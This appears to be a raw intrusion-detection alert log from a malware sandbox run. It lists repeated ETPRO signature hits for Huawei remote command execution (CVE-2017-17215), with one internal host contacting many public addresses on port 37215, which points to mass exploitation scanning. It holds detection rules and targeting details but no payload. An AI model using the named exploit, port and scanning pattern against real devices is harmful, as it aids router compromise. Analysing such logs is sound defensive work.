                                                        06/13/24-21:31:59.197067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839037215192.168.2.14156.132.151.48
                                                        06/13/24-21:32:52.660410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778237215192.168.2.14197.35.159.220
                                                        06/13/24-21:32:54.708990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358837215192.168.2.14156.113.80.115
                                                        06/13/24-21:32:54.727062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230037215192.168.2.1441.186.94.227
                                                        06/13/24-21:32:54.710552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580637215192.168.2.1441.84.216.151
                                                        06/13/24-21:32:01.219409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.14156.57.126.92
                                                        06/13/24-21:32:23.837233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644237215192.168.2.14156.144.249.159
                                                        06/13/24-21:32:09.436737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487237215192.168.2.1441.244.246.14
                                                        06/13/24-21:32:48.568567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343837215192.168.2.14197.245.154.140
                                                        06/13/24-21:31:57.153859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487837215192.168.2.14156.232.82.26
                                                        06/13/24-21:32:36.242332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612237215192.168.2.14156.194.94.232
                                                        06/13/24-21:33:13.231551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595837215192.168.2.14156.72.100.103
                                                        06/13/24-21:33:05.016844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910037215192.168.2.14197.8.62.104
                                                        06/13/24-21:32:36.269367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900037215192.168.2.14156.250.50.227
                                                        06/13/24-21:32:01.224553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.1441.253.146.254
                                                        06/13/24-21:32:25.997287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132637215192.168.2.14197.84.42.64
                                                        06/13/24-21:31:57.136042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937037215192.168.2.14156.163.66.215
                                                        06/13/24-21:32:32.155970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417837215192.168.2.14156.184.1.161
                                                        06/13/24-21:33:11.176728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466037215192.168.2.14197.167.190.44
                                                        06/13/24-21:32:46.504246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416837215192.168.2.14156.152.150.177
                                                        06/13/24-21:32:52.657772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121437215192.168.2.14197.166.171.152
                                                        06/13/24-21:32:50.611393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984437215192.168.2.14197.20.147.205
                                                        06/13/24-21:32:01.238286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510237215192.168.2.14156.232.36.71
                                                        06/13/24-21:33:00.888362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298237215192.168.2.14197.250.7.234
                                                        06/13/24-21:32:25.974175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188637215192.168.2.14197.146.84.37
                                                        06/13/24-21:32:28.048704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498037215192.168.2.1441.27.112.50
                                                        06/13/24-21:32:34.217391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158837215192.168.2.14156.165.78.149
                                                        06/13/24-21:32:42.419267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001637215192.168.2.14197.107.36.187
                                                        06/13/24-21:32:42.419623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387837215192.168.2.14197.23.101.161
                                                        06/13/24-21:32:11.507598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446037215192.168.2.14156.30.203.194
                                                        06/13/24-21:32:36.245571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661237215192.168.2.14197.139.73.251
                                                        06/13/24-21:32:58.841203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444637215192.168.2.1441.180.177.87
                                                        06/13/24-21:32:13.569041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760037215192.168.2.14197.64.66.29
                                                        06/13/24-21:33:07.039609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399237215192.168.2.14197.55.162.159
                                                        06/13/24-21:32:44.450997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451637215192.168.2.1441.224.183.68
                                                        06/13/24-21:32:58.821834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423037215192.168.2.14197.5.177.85
                                                        06/13/24-21:32:15.635162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699237215192.168.2.14197.87.187.90
                                                        06/13/24-21:32:11.488196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386437215192.168.2.14156.55.230.135
                                                        06/13/24-21:32:46.527865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444837215192.168.2.14156.10.238.168
                                                        06/13/24-21:32:05.344321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.1441.27.35.175
                                                        06/13/24-21:32:46.528114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448437215192.168.2.1441.183.27.100
                                                        06/13/24-21:32:01.238712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721437215192.168.2.1441.97.253.112
                                                        06/13/24-21:32:52.658121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824437215192.168.2.14197.132.149.244
                                                        06/13/24-21:32:58.823111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.14197.252.26.189
                                                        06/13/24-21:31:57.093920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834037215192.168.2.1441.30.140.229
                                                        06/13/24-21:32:09.457052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706437215192.168.2.14156.170.208.57
                                                        06/13/24-21:32:40.372517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612637215192.168.2.14156.116.153.74
                                                        06/13/24-21:32:11.485324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089437215192.168.2.14197.186.219.23
                                                        06/13/24-21:32:03.305848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427837215192.168.2.14197.184.21.96
                                                        06/13/24-21:33:15.271084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379637215192.168.2.14197.99.86.150
                                                        06/13/24-21:32:23.837089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.1441.75.127.196
                                                        06/13/24-21:32:44.475748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517637215192.168.2.14197.17.7.119
                                                        06/13/24-21:32:17.696269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443237215192.168.2.14156.136.77.48
                                                        06/13/24-21:32:58.821645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4700637215192.168.2.14197.174.146.94
                                                        06/13/24-21:32:23.945778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737437215192.168.2.14197.136.187.10
                                                        06/13/24-21:31:59.198591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125437215192.168.2.1441.29.99.140
                                                        06/13/24-21:32:42.420815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723237215192.168.2.14156.121.248.53
                                                        06/13/24-21:32:13.545336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982637215192.168.2.14156.152.77.111
                                                        06/13/24-21:32:01.240584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426837215192.168.2.14197.46.116.68
                                                        06/13/24-21:32:48.569597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102237215192.168.2.14156.10.46.222
                                                        06/13/24-21:32:01.246018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015637215192.168.2.14197.253.197.8
                                                        06/13/24-21:32:25.978030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893637215192.168.2.14197.12.57.199
                                                        06/13/24-21:32:50.612129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3711637215192.168.2.14197.137.226.6
                                                        06/13/24-21:32:09.459120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276837215192.168.2.14156.200.130.129
                                                        06/13/24-21:32:21.802117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109437215192.168.2.1441.179.60.118
                                                        06/13/24-21:32:38.316139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673637215192.168.2.1441.185.141.244
                                                        06/13/24-21:32:46.528194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549837215192.168.2.14156.20.45.211
                                                        06/13/24-21:32:40.358390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954837215192.168.2.14197.162.59.118
                                                        06/13/24-21:32:11.488373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267437215192.168.2.14156.189.94.205
                                                        06/13/24-21:32:17.671816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131037215192.168.2.1441.86.45.252
                                                        06/13/24-21:33:00.888277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849837215192.168.2.14156.78.226.123
                                                        06/13/24-21:32:01.223687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048237215192.168.2.14156.227.127.133
                                                        06/13/24-21:32:01.222430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171637215192.168.2.14156.165.103.83
                                                        06/13/24-21:32:13.545693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457037215192.168.2.14156.84.102.199
                                                        06/13/24-21:33:17.304513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829037215192.168.2.14156.209.236.241
                                                        06/13/24-21:32:40.371660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223837215192.168.2.1441.35.86.224
                                                        06/13/24-21:32:56.755698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770037215192.168.2.14197.241.83.36
                                                        06/13/24-21:32:07.403543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122237215192.168.2.14197.46.74.13
                                                        06/13/24-21:32:30.128503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664437215192.168.2.1441.6.194.139
                                                        06/13/24-21:33:13.214290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183637215192.168.2.14156.53.46.180
                                                        06/13/24-21:32:50.633314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3328237215192.168.2.14197.142.89.233
                                                        06/13/24-21:33:00.872372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3996837215192.168.2.14197.128.69.86
                                                        06/13/24-21:33:09.090232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302237215192.168.2.14156.148.232.249
                                                        06/13/24-21:32:21.782195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483037215192.168.2.14156.240.122.218
                                                        06/13/24-21:32:58.823143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181637215192.168.2.1441.107.0.27
                                                        06/13/24-21:33:07.039570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942637215192.168.2.1441.25.105.165
                                                        06/13/24-21:32:42.408187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624437215192.168.2.14156.182.175.154
                                                        06/13/24-21:32:54.726692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184837215192.168.2.14197.119.153.192
                                                        06/13/24-21:31:57.134278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362037215192.168.2.1441.98.18.98
                                                        06/13/24-21:31:59.197865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5429437215192.168.2.14156.8.228.71
                                                        06/13/24-21:32:28.027682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654637215192.168.2.1441.37.117.144
                                                        06/13/24-21:32:44.451399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586437215192.168.2.14197.252.1.218
                                                        06/13/24-21:32:01.241602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344037215192.168.2.1441.208.120.64
                                                        06/13/24-21:32:21.803562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5277037215192.168.2.1441.214.117.126
                                                        06/13/24-21:32:30.097683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110237215192.168.2.14197.151.179.37
                                                        06/13/24-21:33:05.011370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835437215192.168.2.14197.73.174.205
                                                        06/13/24-21:32:44.458433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539437215192.168.2.14197.170.167.80
                                                        06/13/24-21:31:59.175884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020037215192.168.2.1441.23.35.41
                                                        06/13/24-21:33:09.112174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.1441.193.197.157
                                                        06/13/24-21:32:36.245059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336237215192.168.2.14156.113.99.117
                                                        06/13/24-21:32:11.485738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344037215192.168.2.14197.168.108.247
                                                        06/13/24-21:32:52.679390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043837215192.168.2.14156.220.31.248
                                                        06/13/24-21:33:05.014597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393037215192.168.2.14197.144.123.39
                                                        06/13/24-21:32:44.453025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334837215192.168.2.14156.22.235.188
                                                        06/13/24-21:32:05.370433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5846037215192.168.2.14197.164.49.241
                                                        06/13/24-21:32:07.402997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5806837215192.168.2.14197.45.187.133
                                                        06/13/24-21:32:23.942405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14156.17.158.24
                                                        06/13/24-21:32:50.632933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401437215192.168.2.14197.145.192.121
                                                        06/13/24-21:32:25.993825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016437215192.168.2.1441.57.117.170
                                                        06/13/24-21:33:17.303864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316037215192.168.2.14197.189.88.235
                                                        06/13/24-21:32:30.124652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299237215192.168.2.1441.212.96.140
                                                        06/13/24-21:32:36.265034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782037215192.168.2.14156.201.129.14
                                                        06/13/24-21:32:38.302076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690837215192.168.2.1441.40.111.85
                                                        06/13/24-21:32:13.564310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637837215192.168.2.14197.118.93.47
                                                        06/13/24-21:32:36.248271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455037215192.168.2.14156.234.7.144
                                                        06/13/24-21:33:02.908611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643837215192.168.2.14156.45.126.118
                                                        06/13/24-21:31:57.092916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934437215192.168.2.14197.69.11.105
                                                        06/13/24-21:32:17.672234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049637215192.168.2.14156.24.151.120
                                                        06/13/24-21:32:40.376302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902037215192.168.2.14197.231.21.167
                                                        06/13/24-21:32:40.358433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205037215192.168.2.14197.72.138.134
                                                        06/13/24-21:33:17.308209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769837215192.168.2.1441.18.149.146
                                                        06/13/24-21:32:40.374846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931837215192.168.2.14197.249.188.89
                                                        06/13/24-21:32:09.460143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704637215192.168.2.14156.243.42.86
                                                        06/13/24-21:32:21.787098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016637215192.168.2.14156.190.50.84
                                                        06/13/24-21:32:44.458303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565837215192.168.2.1441.36.180.218
                                                        06/13/24-21:32:30.125554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221037215192.168.2.14156.132.183.4
                                                        06/13/24-21:33:00.886820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.1441.84.202.220
                                                        06/13/24-21:32:50.633024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3780637215192.168.2.1441.108.136.82
                                                        06/13/24-21:32:09.440666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934437215192.168.2.14197.187.75.94
                                                        06/13/24-21:33:09.112448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317237215192.168.2.14197.170.29.19
                                                        06/13/24-21:33:02.913347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198437215192.168.2.14197.207.34.195
                                                        06/13/24-21:32:23.836020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.1441.254.213.204
                                                        06/13/24-21:32:13.547274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447437215192.168.2.14156.203.81.155
                                                        06/13/24-21:32:13.568198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3665437215192.168.2.14197.124.189.93
                                                        06/13/24-21:32:01.224013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538037215192.168.2.14156.15.57.226
                                                        06/13/24-21:31:57.093021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186437215192.168.2.1441.39.14.181
                                                        06/13/24-21:32:01.238577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927437215192.168.2.1441.247.55.21
                                                        06/13/24-21:32:23.937311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554037215192.168.2.14156.39.209.17
                                                        06/13/24-21:32:58.820351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085437215192.168.2.1441.74.76.102
                                                        06/13/24-21:32:42.422316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471237215192.168.2.1441.90.104.86
                                                        06/13/24-21:32:52.676952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5803437215192.168.2.1441.1.224.13
                                                        06/13/24-21:32:23.835327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661837215192.168.2.14156.207.183.78
                                                        06/13/24-21:32:54.724563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527037215192.168.2.14197.229.37.83
                                                        06/13/24-21:33:11.180963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031637215192.168.2.14197.15.113.207
                                                        06/13/24-21:32:56.754526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309437215192.168.2.1441.51.93.237
                                                        06/13/24-21:32:54.724781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970637215192.168.2.14197.214.99.236
                                                        06/13/24-21:32:30.099910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087637215192.168.2.14156.18.115.228
                                                        06/13/24-21:32:42.419873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641237215192.168.2.1441.22.5.39
                                                        06/13/24-21:32:50.629070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024637215192.168.2.14156.110.120.169
                                                        06/13/24-21:32:05.347124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.14156.110.220.38
                                                        06/13/24-21:32:30.075211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434837215192.168.2.14197.103.13.128
                                                        06/13/24-21:33:13.230074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14197.31.111.97
                                                        06/13/24-21:33:17.310515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.1441.191.219.155
                                                        06/13/24-21:33:15.253844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875437215192.168.2.14156.245.176.136
                                                        06/13/24-21:32:44.452525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262037215192.168.2.14156.143.57.157
                                                        06/13/24-21:32:03.294241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3803037215192.168.2.1441.231.104.109
                                                        06/13/24-21:33:11.180577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298837215192.168.2.14197.144.173.210
                                                        06/13/24-21:32:03.297189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5811237215192.168.2.1441.79.41.75
                                                        06/13/24-21:32:34.217739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163037215192.168.2.1441.132.231.66
                                                        06/13/24-21:32:05.368717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064237215192.168.2.14156.46.51.117
                                                        06/13/24-21:32:13.569145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335237215192.168.2.1441.99.248.200
                                                        06/13/24-21:33:11.175421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782437215192.168.2.14156.231.198.20
                                                        06/13/24-21:32:13.544497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872837215192.168.2.14156.27.233.193
                                                        06/13/24-21:32:17.678529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860237215192.168.2.14156.249.175.61
                                                        06/13/24-21:31:59.198292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227037215192.168.2.14156.13.175.64
                                                        06/13/24-21:32:54.710678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309637215192.168.2.14156.189.217.210
                                                        06/13/24-21:31:59.196183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333637215192.168.2.1441.219.126.242
                                                        06/13/24-21:32:50.612411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325837215192.168.2.14197.186.12.61
                                                        06/13/24-21:33:00.869322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757037215192.168.2.14197.11.134.154
                                                        06/13/24-21:33:00.872289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835037215192.168.2.14156.30.126.125
                                                        06/13/24-21:32:44.475941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806837215192.168.2.1441.185.206.213
                                                        06/13/24-21:33:17.339555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776837215192.168.2.14156.65.174.109
                                                        06/13/24-21:32:25.993862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291637215192.168.2.14156.221.193.223
                                                        06/13/24-21:32:44.475896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622237215192.168.2.14156.49.17.199
                                                        06/13/24-21:33:09.110311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128037215192.168.2.1441.127.53.91
                                                        06/13/24-21:33:07.054817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520837215192.168.2.14156.104.118.175
                                                        06/13/24-21:32:42.424255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538637215192.168.2.14197.164.191.81
                                                        06/13/24-21:32:34.215381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172437215192.168.2.14156.38.129.51
                                                        06/13/24-21:32:56.754588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933837215192.168.2.14156.46.166.229
                                                        06/13/24-21:32:05.345846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765637215192.168.2.1441.217.138.140
                                                        06/13/24-21:33:02.913203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576637215192.168.2.14156.171.111.23
                                                        06/13/24-21:32:46.502554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014437215192.168.2.1441.12.176.241
                                                        06/13/24-21:32:46.502312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999037215192.168.2.14197.157.177.16
                                                        06/13/24-21:33:07.039244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521837215192.168.2.1441.154.169.39
                                                        06/13/24-21:32:07.404009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026237215192.168.2.14156.2.146.25
